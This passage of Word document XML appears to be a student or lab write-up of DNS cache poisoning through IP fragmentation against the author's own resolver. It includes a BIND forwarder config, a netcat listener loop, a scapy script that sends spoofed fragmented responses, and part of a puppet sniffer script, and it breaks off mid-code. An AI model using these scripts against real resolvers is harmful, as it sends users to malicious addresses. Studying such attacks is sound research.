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4FC4B" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:tab/>
        <w:t>DNS cache poisoning is an attack vector used by hackers to inject records into the cache of recursive dns resolvers so that familiar domain names point to malicious ip adderesses. This type of attack was famously brought to light in 2008 when Dan Kaminsky discovered that most recursive resolvers use static source ports to send query requests to authoritative name servers. Because DNS uses the UDP protocol, the source port was the only thing that the attacker needed to guess in order to send poisoned responses back to the resolver, spoofed from the name server. Since then, dns has implemented more security measures like using a query id at the beginning of the querys and randomizing the source port. However, when a packet is fragmented over ip, the ip id number is the only thing that an attacker needs to guess when poisoning the second fragment of a query response. The second fragment is poisoned to avoid having to guess the query number, in the first fragment, and dns cookie, in the last fragment. In order for this attack to work, the name server must send a response large enough to be fragmented and the recursive resolver must accept fragmented responses. There will also need to be a puppet actor that has client access to the targeted recursive resolver.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705FAB66" w14:textId="7202C976" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Because the ip ID is only slightly </w:t>
      </w:r>
      <w:r>
        <w:t>incremented</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> when communicating with the same host, it would then be possible to make a query from the puppet by </w:t>
      </w:r>
      <w:r>
        <w:t>using</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the +notcp option and ANY type with dig and send the ip ID and other forms of entropy from the response to the poisoning machine from the puppet. The poisoning machine would then use this data to construct many query responses with </w:t>
      </w:r>
      <w:r>
        <w:t>incremented</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ip IDs to send to the recursive resolver, spoofed from the name server. Other security measures from DNS include randomizing the order of the record responses to prevent predictable offsets in A records to be poisoned. In order for this attack to work the "rrset-order" on the authoritative name server must be set to cyclic or fixed. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213F6676" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:tab/>
        <w:t>From the options page in my recursive resolver, I have it set to forward all requests to an authoritative name server that I have made AWS put in Japan to increase the amount of time I have to guess the ip ID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6BA891" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D"/>
    <w:p w14:paraId="1152D3C4" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D"/>
    <w:p w14:paraId="184A80D4" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>---------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3D152F" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">        forwarders {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B62B9EA" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">                3.113.25.188;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05831A02" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">        };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11896398" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">        forward only;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBE7FC8" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">        edns-udp-size 4096;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D38F306" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">        max-udp-size 4096;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCFFF14" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>---------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72796A32" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D"/>
    <w:p w14:paraId="36EBE864" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">This is the script that I have on my poisoning machine, it will continue to listen on a port that will send the same dig request to the puppet </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133F1148" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D"/>
    <w:p w14:paraId="7586BF89" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>--------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6ED671" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>#!/usr/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302587A4" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>notdone="notdone"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD16935" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>while [ $notdone != "done" ]; do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBDECCC" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">   notdone=$(echo "dig @127.0.0.1 monnotsukuyomi ANY +notcp +bufsize=10000 +nocookie" | nc -nlp 8976)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17322015" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">   sleep .25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79059486" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">   if [ $notdone != "doneski" ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661FE325" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">      echo -n $notdone | /home/kali/newscap.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7059F60E" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">   fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46415B57" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5459F3F1" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>--------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F04E81" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D"/>
    <w:p w14:paraId="33005832" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>The different pieces of data are echo'd into my script "/home/kali/newscap.py" that will build the poisoned responses and then send to the recursive resolver.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F444BE2" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D"/>
    <w:p w14:paraId="6A1FEF25" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D"/>
    <w:p w14:paraId="66265AAC" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>-----------/home/kali/newscap.py------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68715877" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>#!/usr/bin/python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5BC138" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E106213" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>ipid=input()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358F5FD9" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>if ipid!='done':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585CE5B7" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">   nsrec=b'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w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>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xc0\x0c\x00\x02\x00\x01\x00\t:\x80\x00\x07\x04ns\xc0\x0c'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE58E2B" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">   ipid=ipid.split('%')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478C0F04" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">   print(ipid)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6328EEFB" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">   last=int(ipid[1]).to_bytes(1,'big')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34650DEB" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">   ns=int(ipid[2],16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D3B814" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">   ipid=int(ipid[0])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C49AA97" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">   brake=ns+44</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012215BC" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">   ain=b'\x00\x01\x00\x01\x00\x09\x3a\x80\x00\x04'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A88D97" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">   arec=b''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444C877D" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">   ns+=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F69D24" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">   firns=ns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF73E3F" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">   while ns &lt;= brake:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111C04BB" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">      print(ns)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEE2790" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">      if ns!=0x74:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D70B0E8" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">         ns=ns%0x74</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073F75D9" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">      print(ns)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2898B6D6" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">      num=hex(ns)[2:].rjust(2,'0').encode()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AB01A5" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">      nsrec=nsrec.replace(b'ns\xc0\x0c',b'ns'+num+b'\xc0\x0c',1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6AB883" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75353B73" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">         off=nsrec.index(b'ns'+num)+1+1470+49152</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16369E05" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">         off-=(19*(firns-1)) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4858E761" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">      except ValueError:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B14B9C" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">         break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAE4B34" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">         #print(nsrec,'\n',b'ns'+num,'\n')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3287F830" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">      ns+=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25490B4D" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">      arec+=off.to_bytes(2,'big')+ain+b'\xde\xad\xbe\xef'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4355D8" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">   sender=nsrec+arec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78414D9B" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">   sender=sender[:1479]+last</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4B232C" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">   #e=Ether(src='34:98:b5:6a:26:a3',dst='e8:fc:af:f8:a7:45',type=0x0800)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69915687" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">   #ip=IP(src='3.113.25.188',dst='192.168.1.201')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B16984" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">   e=Ether(src='e8:fc:af:f8:a7:44',dst='08:00:27:6c:a0:35',type=0x0800)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2992B8" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">   ip=IP(src='3.113.25.188',dst='10.0.0.6')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EE654D" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>#   idlist=[ipid+6,ipid+16,ipid+26,ipid+36,ipid+46,ipid+56,ipid+66,ipid+76,ipid+86,ipid+96,ipid+70,ipid+47,ipid+72]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B10740" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">   #idlist=[ipid+57,ipid+58,ipid+59,ipid+60,ipid+61,ipid+62,ipid+63,ipid+64,ipid+65,ipid+66]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6FF8A5" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D"/>
    <w:p w14:paraId="55A295FA" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">   for i in range(ipid+57,ipid+75):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59606EF6" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">      ip.id=i</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638DB6B8" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">      ip.flags=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA7AB80" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">      ip.frag=185</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116B349B" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">      ip.proto=17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CDCF63" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>#      print(e/ip/Raw(load=sender))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A99E1D4" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">      sendp(e/ip/Raw(load=sender))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C796C31" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4938560A" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D"/>
    <w:p w14:paraId="114986FE" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D"/>
    <w:p w14:paraId="4CCC6B15" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D"/>
    <w:p w14:paraId="5934CFEE" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>Now, here is the script that I put on the puppet machine, much like the script I have on the poisoning machine, it is over complex and in retrospect I should have just sent the entire packet from the puppet to the poisoning machine. However this would not have made the attack work with a randomized rrset-order. It really would have only made the script less convoluted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A19CC5B" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D"/>
    <w:p w14:paraId="2AC1924E" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>--------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F168C9B" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>#!/usr/bin/python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1D0114" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>import socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BF5640" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>import subprocess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455CA400" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0C6A2C" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>import threading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D51C91E" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159D410B" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>mysocket=socket.socket()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD4FEDD" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>#yoursocket=socket.socket()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22424326" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>def worker(text):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6316BAA1" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">   def filterer(pktin):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A02AAAC" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">      return pktin.haslayer(IP) and pktin[IP].src=='3.113.25.188' and pktin[IP].dst=='10.0.0.6' and pktin[IP].flags==1 and pktin[IP].frag==185</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535A6FCF" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">   def processor(pktin):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F80449F" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">      #print(pktin[IP].id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D55B3C" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">      if text=='1' and int(pktin[Raw].load[2:4],16)&lt;42: #or int(pktin[Raw].load[2:4],16)&gt;73):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4219CD9C" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">         mysocket.send(str(pktin[IP].id).encode()+b'%'+str(pktin[Raw].load[-1]).encode()+b'%'+pktin[Raw].load[2:4])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F1B814" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">      elif text=='0' and int(pktin[Raw].load[2:4],16)&lt;42: #or int(pktin[Raw].load[2:4],16)&gt;73):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2FD260" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">         yoursocket.send(str(pktin[IP].id).encode()+b'%'+str(pktin[Raw].load[-1]).encode()+b'%'+pktin[Raw].load[2:4])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA67122" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">      elif text=='1':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4F1166" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">         mysocket.send(b'doneski')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335B4D0C" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">         not1=True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A79AC7" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">      elif text=='0':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E9A0D4" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">         yoursocket.send(b'doneski')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CBCB5E" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">         not1=True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3645B3A2" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">   sniff(iface='eth0', store=0,prn=processor,lfilter=filterer,count=1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B092991" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>def conn(mysocket):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198C5FBE" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">   connected=False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3941BB1D" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">   while not connected:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B41F21" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">      for port in [8976]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1AF56C" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">         try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B463887" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">            print('try port',port)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF37C77" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>#         mysocket.connect(('192.168.1.37',port))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFAD0F3" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">            mysocket.connect(('10.0.0.4',port))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432ECD86" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
